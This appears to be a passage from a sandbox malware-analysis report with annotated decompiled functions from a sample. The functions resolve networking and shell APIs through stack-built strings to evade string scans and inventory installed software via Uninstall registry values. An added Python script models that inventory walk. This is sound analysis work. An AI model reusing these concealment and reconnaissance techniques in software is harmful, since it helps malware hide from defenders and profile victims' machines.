    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

    Control-flow Graph

    Basic blocks (the original renders this as an image with executed and not-executed blocks colour-coded; the colouring is not preserved here):
    • 0: 12d5f07-12d5f0e
    • 1: 12d5f14-12d5fe1 (GetProcAddress x 6)
    • 2: 12d5ffb
    • 3: 12d5ffd-12d5fff
    • 4: 12d5fe3-12d5fe6
    • 5: 12d5fe8-12d5feb
    • 6: 12d5fed-12d5ff0
    • 7: 12d5ff2-12d5ff4
    • 8: 12d5ff6-12d5ff9
    Edges: 0->1, 0->2, 1->2, 1->4, 2->3, 4->2, 4->5, 5->2, 5->6, 6->2, 6->7, 7->2, 7->8, 8->3
    C-Code - Quality: 100%
    			E012D5F07(struct HINSTANCE__* __eax, _Unknown_base(*)()** __edi) {
    				void* _t42;
    				_Unknown_base(*)()* _t43;
    				_Unknown_base(*)()* _t45;
    				_Unknown_base(*)()* _t47;
    				_Unknown_base(*)()* _t49;
    				_Unknown_base(*)()* _t51;
    				_Unknown_base(*)()* _t53;
    				void* _t62;
    
    				 *(_t62 - 4) = __eax; // ws2_32 module handle passed in; the six exports below are resolved from it into the table at __edi
    				if(__eax == 0) {
    					L7:
    					_t42 = 0;
    				} else {
    					 *(_t62 - 0x30) = 0x53415357; // "WSAS"+"tart"+"up" = "WSAStartup" (plain ASCII, no XOR)
    					 *((intOrPtr*)(_t62 - 0x2c)) = 0x74726174;
    					 *((short*)(_t62 - 0x28)) = 0x7075;
    					 *((char*)(_t62 - 0x26)) = 0;
    					_t43 = GetProcAddress(__eax, _t62 - 0x30); // executed
    					 *__edi = _t43; // slot 0: WSAStartup
    					 *(_t62 - 0x3c) = 0x43415357; // "WSAC"+"lean"+"up" = "WSACleanup"
    					 *((intOrPtr*)(_t62 - 0x38)) = 0x6e61656c;
    					 *((short*)(_t62 - 0x34)) = 0x7075;
    					 *((char*)(_t62 - 0x32)) = 0;
    					_t45 = GetProcAddress( *(_t62 - 4), _t62 - 0x3c); // executed
    					 *(__edi + 4) = _t45; // slot 1: WSACleanup
    					 *(_t62 - 0x18) = 0x74656e69; // "inet"+"_add"+"r" = "inet_addr"
    					 *((intOrPtr*)(_t62 - 0x14)) = 0x6464615f;
    					 *((short*)(_t62 - 0x10)) = 0x72;
    					_t47 = GetProcAddress( *(_t62 - 4), _t62 - 0x18); // executed
    					 *(__edi + 8) = _t47; // slot 2: inet_addr
    					 *(_t62 - 0x4c) = 0x68746567; // "geth"+"ostb"+"ynam"+"e" = "gethostbyname"
    					 *((intOrPtr*)(_t62 - 0x48)) = 0x6274736f;
    					 *((intOrPtr*)(_t62 - 0x44)) = 0x6d616e79;
    					 *((short*)(_t62 - 0x40)) = 0x65;
    					_t49 = GetProcAddress( *(_t62 - 4), _t62 - 0x4c); // executed
    					 *(__edi + 0xc) = _t49; // slot 3: gethostbyname
    					 *(_t62 - 0x24) = 0x74656e69; // "inet"+"_nto"+"a" = "inet_ntoa"
    					 *((intOrPtr*)(_t62 - 0x20)) = 0x6f746e5f;
    					 *((short*)(_t62 - 0x1c)) = 0x61;
    					_t51 = GetProcAddress( *(_t62 - 4), _t62 - 0x24); // executed
    					 *(__edi + 0x10) = _t51; // slot 4: inet_ntoa
    					 *(_t62 - 0xc) = 0x686f746e; // "ntoh"+"l" = "ntohl"
    					 *((short*)(_t62 - 8)) = 0x6c;
    					_t53 = GetProcAddress( *(_t62 - 4), _t62 - 0xc); // executed
    					 *(__edi + 0x14) = _t53; // slot 5: ntohl
    					if( *__edi == 0 ||  *(__edi + 8) == 0 ||  *(__edi + 0xc) == 0 ||  *(__edi + 0x10) == 0 || _t53 == 0) { // fails if any slot other than WSACleanup (+4) is unresolved
    						goto L7;
    					} else {
    						_t42 = 1;
    					}
    				}
    				return _t42;
    			}

    Instruction address for each of the 44 body lines above, in order (0x00000000 marks a line the decompiler could not map to an instruction): 0x012d5f09, 0x012d5f0e, 0x012d5ffb, 0x012d5ffb, 0x012d5f14, 0x012d5f20, 0x012d5f27, 0x012d5f2e, 0x012d5f34, 0x012d5f37, 0x012d5f39, 0x012d5f42, 0x012d5f49, 0x012d5f50, 0x012d5f56, 0x012d5f59, 0x012d5f5b, 0x012d5f65, 0x012d5f6c, 0x012d5f73, 0x012d5f79, 0x012d5f7b, 0x012d5f85, 0x012d5f8c, 0x012d5f93, 0x012d5f9a, 0x012d5fa0, 0x012d5fa2, 0x012d5fac, 0x012d5fb3, 0x012d5fba, 0x012d5fc0, 0x012d5fc2, 0x012d5fcc, 0x012d5fd3, 0x012d5fd9, 0x012d5fdb, 0x012d5fe1, 0x00000000, 0x012d5ff6, 0x012d5ff8, 0x012d5ff8, 0x012d5fe1, 0x012d5fff

    APIs
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 012D5F37
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012D5F59
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012D5F79
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?), ref: 012D5FA0
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 012D5FC0
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 012D5FD9
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

    Control-flow Graph

    Basic blocks (the original renders this as an image with executed and not-executed blocks colour-coded; the colouring is not preserved here):
    • 9: 12d5a5f-12d5aab (call 132fbd9)
    • 12: 12d5b5d
    • 13: 12d5ab1-12d5b4d (GetProcAddress x 3)
    • 14: 12d5b5f-12d5b61
    • 15: 12d5b4f-12d5b52
    • 16: 12d5b54-12d5b56
    • 17: 12d5b58-12d5b5b
    Edges: 9->12, 9->13, 12->14, 13->12, 13->15, 15->12, 15->16, 16->12, 16->17, 17->14
    C-Code - Quality: 94%
    			E012D5A5F(_Unknown_base(*)()** __esi) {
    				struct HINSTANCE__* _v8;
    				short _v10;
    				short _v12;
    				short _v14;
    				short _v16;
    				short _v18;
    				short _v20;
    				short _v22;
    				char _v24;
    				short _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v46;
    				short _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				char _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				char _v88;
    				short _t36;
    				short _t37;
    				short _t38;
    				short _t39;
    				short _t40;
    				short _t41;
    				struct HINSTANCE__* _t44;
    				_Unknown_base(*)()* _t46;
    				_Unknown_base(*)()* _t48;
    				_Unknown_base(*)()* _t50;
    
    				_t36 = 0x53; // builds L"SHELL32" one UTF-16 unit at a time in _v24.._v10
    				_v24 = _t36;
    				_t37 = 0x48;
    				_v22 = _t37;
    				_t38 = 0x45;
    				_v20 = _t38;
    				_t39 = 0x4c;
    				_v18 = _t39;
    				_v16 = _t39;
    				_t40 = 0x33;
    				_v14 = _t40;
    				_t41 = 0x32;
    				_v12 = _t41;
    				_v10 = 0;
    				_push( &_v24);
    				_t44 = E0132FBD9( &_v24); // module lookup/load wrapper for L"SHELL32"; returns an HINSTANCE or 0
    				_v8 = _t44;
    				if(_t44 == 0) {
    					L5:
    					return 0;
    				}
    				_push(_t55); // _t55 is not declared above: decompiler output
    				_v44 = 0x72434853; // "SHCr"+"eate"+"Shel"+"lIte"+"m" = "SHCreateShellItem" (plain ASCII, no XOR)
    				_v40 = 0x65746165;
    				_v36 = 0x6c656853;
    				_v32 = 0x6574496c;
    				_v28 = 0x6d;
    				_t46 = GetProcAddress(_t44,  &_v44); // executed
    				 *__esi = _t46; // slot 0: SHCreateShellItem
    				_v64 = 0x61504853; // "SHPa"+"rseD"+"ispl"+"ayNa"+"me" = "SHParseDisplayName"
    				_v60 = 0x44657372;
    				_v56 = 0x6c707369;
    				_v52 = 0x614e7961;
    				_v48 = 0x656d;
    				_v46 = 0;
    				_t48 = GetProcAddress(_v8,  &_v64); // executed
    				 *(__esi + 4) = _t48; // slot 1: SHParseDisplayName
    				_v88 = 0x65474853; // "SHGe"+"tSpe"+"cial"+"Fold"+"erPa"+"thW" = "SHGetSpecialFolderPathW"
    				_v84 = 0x65705374;
    				_v80 = 0x6c616963;
    				_v76 = 0x646c6f46;
    				_v72 = 0x61507265;
    				_v68 = 0x576874;
    				_t50 = GetProcAddress(_v8,  &_v88); // executed
    				 *(__esi + 8) = _t50; // slot 2: SHGetSpecialFolderPathW
    				if( *__esi == 0 ||  *(__esi + 4) == 0 || _t50 == 0) { // any of the three unresolved: return 0
    					goto L5;
    				} else {
    					return 1;
    				}
    			}

    Instruction address for each of the 50 body lines above, in order (0x00000000 marks a line the decompiler could not map to an instruction): 0x012d5a68, 0x012d5a6b, 0x012d5a6f, 0x012d5a72, 0x012d5a76, 0x012d5a79, 0x012d5a7d, 0x012d5a80, 0x012d5a84, 0x012d5a88, 0x012d5a89, 0x012d5a8f, 0x012d5a90, 0x012d5a96, 0x012d5a9d, 0x012d5a9f, 0x012d5aa6, 0x012d5aab, 0x012d5b5d, 0x00000000, 0x012d5b5d, 0x012d5ab1, 0x012d5abd, 0x012d5ac4, 0x012d5acb, 0x012d5ad2, 0x012d5ad9, 0x012d5adf, 0x012d5ae1, 0x012d5aea, 0x012d5af1, 0x012d5af8, 0x012d5aff, 0x012d5b06, 0x012d5b0c, 0x012d5b0f, 0x012d5b11, 0x012d5b1b, 0x012d5b22, 0x012d5b29, 0x012d5b30, 0x012d5b37, 0x012d5b3e, 0x012d5b45, 0x012d5b47, 0x012d5b4d, 0x00000000, 0x012d5b58, 0x00000000, 0x012d5b5a

    APIs
    • GetProcAddress.KERNEL32(00000000,?,?,?,?,00000000), ref: 012D5ADF
    • GetProcAddress.KERNEL32(012D136C,?), ref: 012D5B0F
    • GetProcAddress.KERNEL32(012D136C,?), ref: 012D5B45
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			// MSVC CRT start-up helper (the _mtinit pattern): __eax is the kernel32
    			// module handle. It resolves the Fiber Local Storage exports into four
    			// global slots; if any is missing (pre-Vista kernel32) the slots are
    			// redirected to TLS-based substitutes. Compiler runtime, not sample logic.
    			E012C355D(struct HINSTANCE__* __eax, void* __ebx, void* __ecx, void* __esi) {
    				_Unknown_base(*)()* _t2;
    				_Unknown_base(*)()* _t3;
    				_Unknown_base(*)()* _t4;
    				_Unknown_base(*)()* _t5; // FlsFree; used below but left undeclared by the decompiler
    				void* _t11;
    				struct HINSTANCE__* _t12;
    				_Unknown_base(*)()* _t16;
    
    				_t11 = __ecx;
    				_t12 = __eax;
    				if(__eax != 0) {
    					_t2 = GetProcAddress(__eax, "FlsAlloc"); // executed
    					 *0x12e38d4 = _t2; // executed: FlsAlloc slot
    					_t3 = GetProcAddress(_t12, "FlsGetValue"); // executed
    					 *0x12e38d8 = _t3; // executed: FlsGetValue slot
    					_t4 = GetProcAddress(_t12, "FlsSetValue"); // executed
    					 *0x12e38dc = _t4; // executed: FlsSetValue slot
    					_t5 = GetProcAddress(_t12, "FlsFree"); // executed
    					_t16 =  *0x12dc194; // import slot used as the FlsSetValue fallback
    					 *0x12e38e0 = _t5; // FlsFree slot
    					if( *0x12e38d4 == 0 ||  *0x12e38d8 == 0 ||  *0x12e38dc == 0 || _t5 == 0) {
    						// Fallback: FlsGetValue/FlsSetValue/FlsFree are replaced by the
    						// imported Tls* functions (presumably) and FlsAlloc by a local wrapper.
    						 *0x12e38d8 =  *0x12dc198;
    						_t5 =  *0x12dc190;
    						 *0x12e38d4 = E012C325F;
    						 *0x12e38dc = _t16;
    						 *0x12e38e0 =  *0x12dc190;
    					}
    					return E01371E19(_t5, _t11);
    				}
    				E012C329C(__ebx); // failure path; frees the TLS slot (TlsFree, per the API list)
    				return 0;
    			}

    APIs
    • GetProcAddress.KERNEL32(?,FlsAlloc), ref: 012C3579
    • GetProcAddress.KERNEL32(?,FlsGetValue,?,FlsAlloc), ref: 012C3586
    • GetProcAddress.KERNEL32(?,FlsSetValue,?,FlsGetValue,?,FlsAlloc), ref: 012C3593
    • GetProcAddress.KERNEL32(?,FlsFree,?,FlsSetValue,?,FlsGetValue,?,FlsAlloc), ref: 012C35A0
      • Part of subcall function 012C329C: TlsFree.KERNEL32(00000016), ref: 012C32C7
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

    Control-flow Graph

    C-Code - Quality: 93%
    			// Installed-software inventory. With a registry key handle already open in
    			// *(ebp-0x10), the function builds the value names "ParentKeyName",
    			// "SystemComponent", "DisplayName" and "DisplayVersion" as wide stack
    			// strings (one 16-bit store per character, so none of them is visible in
    			// the string dump) and queries them with RegQueryValueExW. These are the
    			// value names of per-program Uninstall subkeys; the key path itself is not
    			// visible in this function.
    			E012CD775(void* __eax, void* __ebx, void* __edi, void* __esi) {
    				void* _t118;
    				void* _t119;
    				void* _t121;
    
    				_t119 = __edi;
    				_t118 = __ebx;
    				_t113 = __eax;
    				if(__eax == 0) {
    					__eax = 0x50;
    					 *(__ebp - 0x98) = __ax;
    					__eax = 0x61;
    					 *(__ebp - 0x96) = __ax;
    					__eax = 0x72;
    					 *(__ebp - 0x94) = __ax;
    					__eax = 0x65;
    					 *(__ebp - 0x92) = __ax;
    					__eax = 0x6e;
    					 *(__ebp - 0x90) = __ax;
    					__eax = 0x74;
    					 *(__ebp - 0x8e) = __ax;
    					__eax = 0x4b;
    					 *(__ebp - 0x8c) = __ax;
    					__eax = 0x65;
    					 *(__ebp - 0x8a) = __ax;
    					__eax = 0x79;
    					 *(__ebp - 0x88) = __ax;
    					__eax = 0x4e;
    					 *(__ebp - 0x86) = __ax;
    					__eax = 0x61;
    					 *(__ebp - 0x84) = __ax;
    					__eax = 0x6d;
    					 *(__ebp - 0x82) = __ax;
    					__eax = 0x65;
    					 *(__ebp - 0x80) = __ax;
    					__eax = 0;
    					 *(__ebp - 0x7e) = __ax;
    					__eax = __ebp - 0x98; // L"ParentKeyName" (built above one UTF-16 unit at a time)
    					__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0x98, __ebx, __ebx, __ebx, __ebx); // executed
    					if(__eax == 0) {
    						goto L1; // value present: child (patch/update) entry, skipped
    					}
    					__eax = 0x53;
    					 *(__ebp - 0xd8) = __ax;
    					__eax = 0x79;
    					 *(__ebp - 0xd6) = __ax;
    					__eax = 0x73;
    					 *(__ebp - 0xd4) = __ax;
    					__eax = 0x74;
    					 *(__ebp - 0xd2) = __ax;
    					__eax = 0x65;
    					 *(__ebp - 0xd0) = __ax;
    					__eax = 0x6d;
    					 *(__ebp - 0xce) = __ax;
    					__eax = 0x43;
    					 *(__ebp - 0xcc) = __ax;
    					__eax = 0x6f;
    					 *(__ebp - 0xca) = __ax;
    					__eax = 0x6d;
    					 *(__ebp - 0xc8) = __ax;
    					__eax = 0x70;
    					 *(__ebp - 0xc6) = __ax;
    					__eax = 0x6f;
    					 *(__ebp - 0xc4) = __ax;
    					__eax = 0x6e;
    					 *(__ebp - 0xc2) = __ax;
    					__eax = 0x65;
    					 *(__ebp - 0xc0) = __ax;
    					__eax = 0x6e;
    					 *(__ebp - 0xbe) = __ax;
    					__eax = 0x74;
    					 *(__ebp - 0xbc) = __ax;
    					__eax = 0;
    					 *(__ebp - 0xba) = __ax;
    					__ebp - 0xc = __ebp - 0x148;
    					__eax = __ebp - 0xd8; // L"SystemComponent"
    					 *(__ebp - 0xc) = 4; // cbData = sizeof(DWORD)
    					__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0xd8, __ebx, __ebx, __ebp - 0x148, __ebp - 0xc); // executed
    					if(__eax != 0 ||  *(__ebp - 0x148) != 1) { // continue unless SystemComponent == 1
    						__eax = 0x44;
    						 *(__ebp - 0x7c) = __ax;
    						__eax = 0x69;
    						 *(__ebp - 0x7a) = __ax;
    						__eax = 0x73;
    						 *(__ebp - 0x78) = __ax;
    						__eax = 0x70;
    						 *(__ebp - 0x76) = __ax;
    						__eax = 0x6c;
    						 *(__ebp - 0x74) = __ax;
    						__eax = 0x61;
    						 *(__ebp - 0x72) = __ax;
    						__eax = 0x79;
    						 *(__ebp - 0x70) = __ax;
    						__eax = 0x4e;
    						 *(__ebp - 0x6e) = __ax;
    						__eax = 0x61;
    						 *(__ebp - 0x6c) = __ax;
    						__eax = 0x6d;
    						 *(__ebp - 0x6a) = __ax;
    						__eax = 0x65;
    						 *(__ebp - 0x68) = __ax;
    						__eax = 0;
    						 *(__ebp - 0x66) = __ax;
    						__ebp - 0xc = __ebp - 0x24c;
    						__eax = __ebp - 0x7c; // L"DisplayName"
    						 *(__ebp - 0xc) = __edi; // cbData = size of the buffer at ebp-0x24c
    						__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0x7c, __ebx, __ebx, __ebp - 0x24c, __ebp - 0xc); // executed
    						if(__eax != 0) {
    							goto L1; // no DisplayName: entry skipped
    						}
    						__ebp - 0x24c = __ebp - 0x44c;
    						__eax = E012C1667(__ebp - 0x44c, __edi, __ebp - 0x24c, 0xffffffff);
    						__eax = 0x44;
    						 *(__ebp - 0xb8) = __ax;
    						__eax = 0x69;
    						 *(__ebp - 0xb6) = __ax;
    						__eax = 0x73;
    						 *(__ebp - 0xb4) = __ax;
    						__eax = 0x70;
    						 *(__ebp - 0xb2) = __ax;
    						__eax = 0x6c;
    						 *(__ebp - 0xb0) = __ax;
    						__eax = 0x61;
    						 *(__ebp - 0xae) = __ax;
    						__eax = 0x79;
    						 *(__ebp - 0xac) = __ax;
    						__eax = 0x56;
    						 *(__ebp - 0xaa) = __ax;
    						__eax = 0x65;
    						 *(__ebp - 0xa8) = __ax;
    						__eax = 0x72;
    						 *(__ebp - 0xa6) = __ax;
    						__eax = 0x73;
    						 *(__ebp - 0xa4) = __ax;
    						__eax = 0x69;
    						 *(__ebp - 0xa2) = __ax;
    						__eax = 0x6f;
    						 *(__ebp - 0xa0) = __ax;
    						__eax = 0x6e;
    						 *(__ebp - 0x9e) = __ax;
    						__eax = 0;
    						 *(__ebp - 0x9c) = __ax;
    						__ebp - 0xc = __ebp - 0x24c;
    						__eax = __ebp - 0xb8; // L"DisplayVersion"
    						 *(__ebp - 0xc) = __edi;
    						__eax = RegQueryValueExW( *(__ebp - 0x10), __ebp - 0xb8, __ebx, __ebx, __ebp - 0x24c, __ebp - 0xc); // executed
    						if(__eax == 0) {
    							// name + "   (" + version + <string at 0x12e06d4, not shown in this report>
    							__ebp - 0x44c = E012C1F39(__ebp - 0x44c, __edi, L"   (", 0xffffffff);
    							__ebp - 0x24c = __ebp - 0x44c;
    							E012C1F39(__ebp - 0x44c, __edi, __ebp - 0x24c, 0xffffffff) = __ebp - 0x44c;
    							__eax = E012C1F39(__ebp - 0x44c, __edi, 0x12e06d4, 0xffffffff);
    						}
    						__ebp - 0x44c = E012C1F39(__ebp - 0x44c, __edi, "\n", 0xffffffff); // one entry per line
    						// Append the line to the growing wide-string buffer at *(ebp-8);
    						// the do/while loops below are inline wcslen.
    						__eax =  *(__ebp - 8);
    						if(__eax != __ebx) {
    							__edx = __eax + 2;
    							do {
    								__cx =  *__eax;
    								__eax = __eax + 2;
    							} while (__cx != __bx);
    							__eax = __eax - __edx;
    							__ecx = __eax;
    							__eax = __ebp - 0x44c;
    							__edx = __eax + 2;
    							 *(__ebp + 8) = __eax + 2;
    							do {
    								__dx =  *__eax;
    								__eax = __eax + 2;
    							} while (__dx != __bx);
    							__eax = __eax -  *(__ebp + 8);
    							__eax = __eax >> 1;
    							__eax = __eax + __ecx;
    							 *(__ebp + 8) = __eax;
    							__eax = E012C1D71(__edi, __esi,  *(__ebp - 8), __eax); // executed
    							_pop(__ecx);
    							_pop(__ecx);
    							 *(__ebp - 8) = __eax;
    							goto L21;
    						} else {
    							__eax = __ebp - 0x44c;
    							__edx = __eax + 2;
    							do {
    								__cx =  *__eax;
    								__eax = __eax + 2;
    							} while (__cx != __bx);
    							__eax = __eax - __edx;
    							__eax = __eax >> 1;
    							 *(__ebp + 8) = __eax;
    							 *(__ebp - 8) = __eax;
    							__eax = E012C8BA0(__eax, __ebx,  *(__ebp + 8));
    							L21:
    							__eax = __ebp - 0x44c;
    							__edx = __eax + 2;
    							do {
    								__cx =  *__eax;
    								__eax = __eax + 2;
    							} while (__cx != __bx);
    							__ebp - 0x44c =  *(__ebp + 8);
    							__eax =  *(__ebp + 8) >> 1;
    							__eax = E012C1F39( *(__ebp - 8),  *(__ebp + 8) >> 1, __ebp - 0x44c,  *(__ebp + 8) >> 1);
    							goto L1;
    						}
    					} else {
    						goto L1;
    					}
    				}
    				L1:
    				if( *((intOrPtr*)(_t121 - 0x10)) == _t118) {
    					_push(_t118);
    					_push(_t118);
    					_push(_t118);
    					_push(_t118);
    					_push(_t121 - 0xc);
    					_push(_t121 - 0x24c);
    					_push( *((intOrPtr*)(_t121 - 0x24)));
    					 *((intOrPtr*)(_t121 - 0xc)) = 0x80;
    					_push( *((intOrPtr*)(_t121 - 0x2c)));
    					return E0130BA8E(_t121 - 0x24c, _t119);
    				}
    				_push( *((intOrPtr*)(_t121 - 0x10)));
    				return E0130F7C9(_t113);
    			}

    APIs
    • RegQueryValueExW.KERNEL32(?,?), ref: 012CD80C
    • RegQueryValueExW.KERNEL32(?,?,?,?,?,?), ref: 012CD8D3
    • RegQueryValueExW.KERNEL32(?,?,?,?,?,00000004,?,?,?,?), ref: 012CD950
    • RegQueryValueExW.KERNEL32(?,?,?,?,?,00000004), ref: 012CDA22
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
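The value names E012CD775 queries (ParentKeyName, SystemComponent, DisplayName, DisplayVersion) are those of per-program Uninstall subkeys, and the decompilation fixes both the skip rules and the output format. The script below is an added example, not code from the sample or from Joe Sandbox: it applies the same three checks to a constructed set of subkeys so it runs anywhere, and on Windows can read the real values. The Uninstall key path and the closing ")" after the version are assumptions; the report shows neither.

```python
"""Model of the installed-program walk in E012CD775, runnable offline.

Added example, not code from the sample or from Joe Sandbox. The checks and the
line format are read off the decompilation; the closing ")" and the Uninstall
key path are assumptions (the report shows neither).
"""
import sys
from typing import Dict, Optional, Union

RegValue = Union[str, int]
INVENTORY_VALUES = ("ParentKeyName", "SystemComponent", "DisplayName", "DisplayVersion")


def describe_program(values: Dict[str, RegValue], closer: str = ")") -> Optional[str]:
    """Apply the three RegQueryValueExW checks of E012CD775 to one subkey.

    Returns the line the sample appends to its inventory, or None when the
    entry is skipped:
      * a ParentKeyName value exists     -> skipped (child/patch record)
      * SystemComponent is the DWORD 1   -> skipped (hidden from Programs and Features)
      * no DisplayName                   -> skipped
    With a DisplayVersion the line is <name> + "   (" + <version> + closer;
    the real closer is the string at 0x12e06d4, which the report does not show.
    """
    if "ParentKeyName" in values:
        return None
    if values.get("SystemComponent") == 1:
        return None
    name = values.get("DisplayName")
    if not isinstance(name, str):
        return None
    version = values.get("DisplayVersion")
    if isinstance(version, str):
        name += "   (" + version + closer
    return name + "\n"


def build_inventory(subkeys: Dict[str, Dict[str, RegValue]]) -> str:
    """Concatenate the per-entry lines, as the sample grows its buffer at *(ebp-8)."""
    lines = (describe_program(v) for v in subkeys.values())
    return "".join(line for line in lines if line)


def read_uninstall_subkeys(
        path: str = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
) -> Dict[str, Dict[str, RegValue]]:
    """Windows only: read the same four values from every subkey of `path`.

    The path is an assumption; the decompilation only shows an open key handle.
    """
    import winreg  # imported here so the module also loads on non-Windows hosts
    result: Dict[str, Dict[str, RegValue]] = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            sub = winreg.EnumKey(root, i)
            with winreg.OpenKey(root, sub) as key:
                values: Dict[str, RegValue] = {}
                for name in INVENTORY_VALUES:
                    try:
                        values[name] = winreg.QueryValueEx(key, name)[0]
                    except FileNotFoundError:
                        pass  # value absent, exactly what RegQueryValueExW != 0 means above
                result[sub] = values
    return result


# Constructed stand-in for Uninstall subkeys (not taken from the report).
SAMPLE_SUBKEYS: Dict[str, Dict[str, RegValue]] = {
    "{example-app}": {"DisplayName": "Example App", "DisplayVersion": "1.2.3"},
    "KB0000000": {"DisplayName": "Example Hotfix", "ParentKeyName": "{example-app}"},
    "{hidden-runtime}": {"DisplayName": "Example Runtime", "SystemComponent": 1},
    "{visible-tool}": {"DisplayName": "Example Tool", "SystemComponent": 0},
    "{nameless}": {"DisplayVersion": "9.9"},
}


if __name__ == "__main__":
    data = read_uninstall_subkeys() if sys.platform == "win32" else SAMPLE_SUBKEYS
    sys.stdout.write(build_inventory(data))
```

On the constructed data this prints `Example App   (1.2.3)` and `Example Tool`, one per line: the hotfix, the hidden component and the nameless entry are dropped, which is the same list Programs and Features would show. That line shape is what to look for when the sample's output buffer turns up in a memory dump.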

    Control-flow Graph

    C-Code - Quality: 46%
    			// Continuation of the CRT's _mtinit: the calls through *__esi are
    			// EncodePointer and those through *__edi are DecodePointer (see the API
    			// list). The four Fls* slots are stored encoded, FlsAlloc is then called
    			// with E012C3420 as the per-thread destructor, the FLS index is kept at
    			// 0x12e2904, and a 0x214-byte per-thread data block is allocated and
    			// registered. Compiler runtime, not sample logic.
    			E012C3626(void* __ebx, void* __edx, intOrPtr* __edi, intOrPtr* __esi) {
    				intOrPtr _t3;
    				intOrPtr _t4;
    				intOrPtr _t5;
    				intOrPtr _t6;
    				void* _t7;
    				void* _t9;
    				intOrPtr* _t11;
    				intOrPtr _t12;
    				intOrPtr* _t14;
    				void* _t15;
    				void* _t16;
    				intOrPtr _t17;
    				void* _t19; // __ebx pass-through, left undeclared by the decompiler
    				intOrPtr* _t25;
    				intOrPtr* _t29;
    				void* _t33; // result of the FlsSetValue call, likewise undeclared
    
    				_t25 = __edi;
    				_t19 = __ebx;
    				_t3 =  *__esi(); // executed: EncodePointer(FlsAlloc slot)
    				_push( *0x12e38d8);
    				 *0x12e38d4 = _t3; // executed
    				_t4 =  *__esi(); // executed: EncodePointer(FlsGetValue slot)
    				_push( *0x12e38dc);
    				 *0x12e38d8 = _t4; // executed
    				_t5 =  *__esi(); // executed: EncodePointer(FlsSetValue slot)
    				_push( *0x12e38e0);
    				 *0x12e38dc = _t5; // executed
    				_t6 =  *__esi(); // executed: EncodePointer(FlsFree slot)
    				 *0x12e38e0 = _t6;
    				_t7 = E012C82EA();
    				if(_t7 == 0) {
    					L5:
    					E012C329C(_t19); // failure path (TlsFree, per the API list)
    					_t9 = 0;
    					__eflags = 0;
    				} else {
    					E0137FDFC(__ebx, __edi);
    					_t11 =  *_t25( *0x12e38d4, E012C3420, _t7); // executed: DecodePointer(FlsAlloc slot)
    					_t12 =  *_t11(); // FlsAlloc(E012C3420)
    					 *0x12e2904 = _t12; // FLS index
    					if(_t12 == 0xffffffff) { // FLS_OUT_OF_INDEXES
    						goto L5;
    					} else {
    						_t29 = E012C8FD6(1, 0x214); // calloc-style allocation of the per-thread data block (retries with Sleep, per the API list)
    						if(_t29 == 0) {
    							goto L5;
    						} else {
    							_t14 =  *_t25( *0x12e38dc,  *0x12e2904, _t29); // executed: DecodePointer(FlsSetValue slot)
    							_t15 =  *_t14(); // FlsSetValue(index, block)
    							_t33 = _t15;
    							if(_t15 == 0) {
